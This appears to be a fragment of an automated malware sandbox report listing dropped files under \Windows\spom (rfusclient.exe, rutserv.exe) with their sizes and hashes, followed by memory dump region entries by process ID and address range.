SHA2560e33c9f15b53de632108ef6f7275cd4d980df86a408f330c57f717b7d5fa3918
SHA512346dd9da1fe6be5219cb10cbe54c60a1661c5c06a21f3cf864a3f32121a90d29ea1bbcef33d2766811f3ef3242456c2c9606326c26d8b660fa26ff4ae8b24515
-
\Windows\spom\rfusclient.exeFilesize
1.3MB
MD5314f4d76a82e024a1c0facb46f0dbc0a
SHA1c8437c555755302a47229cdc18b58d0ee961d00f
SHA2569c41fabd1d00f7330f7d61cc242022da6d51c29ee63b2bfab6868f04fd9eab67
SHA512b4f2bbfd5e2e01bf0a1516857381171bf2ce928bc4fdd03eebae112963862616eeaf943230e99258dcdf15e12e0b38da5895a60341ece378ded8131305514cd9
-
\Windows\spom\rutserv.exeFilesize
1.4MB
MD5a329f920e01574d2c58eb0626abef7bd
SHA12500ca31396264cf0a9492d879e493a9438404b9
SHA25676fc2b851ae7a62f8494809595c8b02d2de54d7509601e90be61dece0cf2a5c2
SHA512dd8bdb39afbc094bf9300e8cd448cb9ca4eeca550c392a924726bedc71dea1a80b3bfa1eaa03d60d6fa233e0ecc52a29601d654c5017f8bd27f5e8d85afc1b32
-
memory/296-59-0x0000000000000000-mapping.dmp
-
memory/332-61-0x0000000000000000-mapping.dmp
-
memory/524-65-0x0000000000000000-mapping.dmp
-
memory/592-60-0x0000000000000000-mapping.dmp
-
memory/672-118-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/672-115-0x0000000000000000-mapping.dmp
-
memory/756-89-0x0000000000000000-mapping.dmp
-
memory/804-119-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/804-121-0x0000000002880000-0x0000000002E2E000-memory.dmpFilesize
5.7MB
-
memory/804-109-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/804-110-0x0000000002880000-0x0000000002E2E000-memory.dmpFilesize
5.7MB
-
memory/868-62-0x0000000000000000-mapping.dmp
-
memory/932-84-0x0000000000000000-mapping.dmp
-
memory/1064-58-0x0000000000000000-mapping.dmp
-
memory/1136-64-0x0000000000000000-mapping.dmp
-
memory/1160-77-0x0000000002350000-0x00000000029F9000-memory.dmpFilesize
6.7MB
-
memory/1160-56-0x0000000000000000-mapping.dmp
-
memory/1220-87-0x0000000000000000-mapping.dmp
-
memory/1356-74-0x0000000000000000-mapping.dmp
-
memory/1356-78-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/1356-79-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/1392-85-0x0000000000000000-mapping.dmp
-
memory/1492-55-0x0000000000400000-0x000000000078A000-memory.dmpFilesize
3.5MB
-
memory/1492-54-0x0000000076BA1000-0x0000000076BA3000-memory.dmpFilesize
8KB
-
memory/1600-86-0x0000000000000000-mapping.dmp
-
memory/1648-63-0x0000000000000000-mapping.dmp
-
memory/1652-112-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/1652-120-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/1652-104-0x0000000000000000-mapping.dmp
-
memory/1704-80-0x0000000000000000-mapping.dmp
-
memory/1704-83-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/1848-114-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/1848-105-0x0000000000000000-mapping.dmp
-
memory/1848-122-0x0000000000400000-0x00000000009AE000-memory.dmpFilesize
5.7MB
-
memory/1896-90-0x0000000000000000-mapping.dmp
-
memory/1908-88-0x0000000000000000-mapping.dmp
-
memory/1916-113-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB
-
memory/1916-91-0x0000000000000000-mapping.dmp
-
memory/1916-94-0x0000000000400000-0x0000000000AA9000-memory.dmpFilesize
6.7MB